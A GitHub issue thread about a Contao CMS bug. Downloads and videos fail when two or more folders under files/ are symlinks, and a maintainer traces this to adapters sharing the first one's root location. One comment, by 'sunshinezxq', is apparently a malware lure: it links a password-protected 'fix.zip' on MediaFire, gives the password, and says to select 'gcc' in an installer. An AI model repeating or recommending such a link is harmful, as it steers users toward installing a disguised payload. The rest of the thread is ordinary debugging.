### ISSUE TITLE
Downloads do not work if they are in a symlink folder (ALL-INKL)

### ISSUE THREAD

**Issue by ufeldmann** [contao/contao#7482]
### Affected version(s)

5.3.12, 5.3.13

### Description

Once again I have a problem with symlinks.
The last fix regarding videos in symlinks (#7313) works perfectly on our Hetzner server.

However, we have now noticed that the downloads no longer work for a customer hosted by ALL-INKL.
Up to version 5.13.11 they still work.

From version 5.13.12 onwards, the page is simply reloaded and no download is started.
The downloads are displayed in the backend and frontend, but the download itself does not work.
This only occurs with ALL-INK, the problem does not exist with our Hetzner server and the same client data.

`$this->getFile($request, $storage)` in `FileDownloadHelper.php` returns null.
https://github.com/contao/contao/blob/d5715178edc65555c5c04c0028165a342ed91650/core-bundle/src/Filesystem/FileDownloadHelper.php#L105C9-L105C59

Our structure is the following (as in Issue #7313):
current (symlink to the current release in the releases folder, the document root is current/public)
releases (folder with the individual releases)
shared/files/content (folder with the files. In the release folder a symlink is created from files/content to this folder)

If I can help with anything (debug info or access), please let me know.

Thanks in advance.

**Comment by fritzmg** [comment]
> `$this->getFile($request, $storage)` in `FileDownloadHelper.php` returns null.

If that's the case, then an error should occur. But according to your description, no error occurs?

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ufeldmann** [comment]
Yes, the response error is not thrown, but only the page is reloaded with the parameters at the url.

**Comment by fritzmg** [comment]
Then there must be some other issue. In any case, I cannot reproduce the issue, at least not with the reproduction steps provided.

**Comment by ufeldmann** [comment]
Thx for your feedback. I have now installed the Contao demo on the same hosting and also stored the files folder as a symlink and the error does not actually occur there either. I will investigate this further.

**Comment by ufeldmann** [comment]
I can reproduce the problem also in the demo.

I have set up the contaodemo folder as a symlink in the Contao demo.
`shared/files/contaodemo -> files/contaodemo`
This works perfectly. The downloads from the contaodemo folder can be downloaded.

However, if I now set up another symlink folder, e.g. `shared/files/inhalte -> files/inhalte`, the downloads from the contaodemo folder no longer work.

If I test the whole thing with a video, I have similar behaviour. 
If I only have one symlink folder, then the video is displayed in the frontend. If I have another symlink folder, the video is not found and the following error message appears in the backend:

```
An exception has been thrown during the rendering of a template (‘Unable to retrieve metadata from “files/contaodemo/media/3972289-hd_1366_720_50fps.mp4”.’).
```

We also have two symlinks in our customer installation. If I deactivate one, it works without any problems.

Hopefully this description can help.

**Comment by fritzmg** [comment]
> However, if I now set up another symlink folder, e.g. `shared/files/inhalte -> files/inhalte`, the downloads from the contaodemo folder no longer work.

Did you run `vendor/bin/contao-setup` afterwards?

**Comment by ufeldmann** [comment]
I always have it freshly deployed, then composer install is called.
I have now also called `vendor/bin/contao-setup` as a test, but as expected no change.

**Comment by fritzmg** [comment]
So what are the exact reproduction steps? Is just having two symlinked folders in `files/` enough?

**Comment by ufeldmann** [comment]
Yes, but we only have this problem on ALL-INKL webhosting. On our Hetzner Server it (download and video) works also with two symlinks and Contao 5.3.13.

**Comment by fritzmg** [comment]
> However, if I now set up another symlink folder, e.g. `shared/files/inhalte -> files/inhalte`, the downloads from the contaodemo folder no longer work.

What exactly happens?

**Comment by fritzmg** [comment]
I can reproduce the issue when there are two or more symlinks within `files/`. The issue is that the subsequent adapters will all have the `rootLocation` of the first adapter:

<img src="https://github.com/user-attachments/assets/157a852d-c8d4-402c-93b3-02875f749a90" width="461">

**Comment by fritzmg** [comment]
See #7485
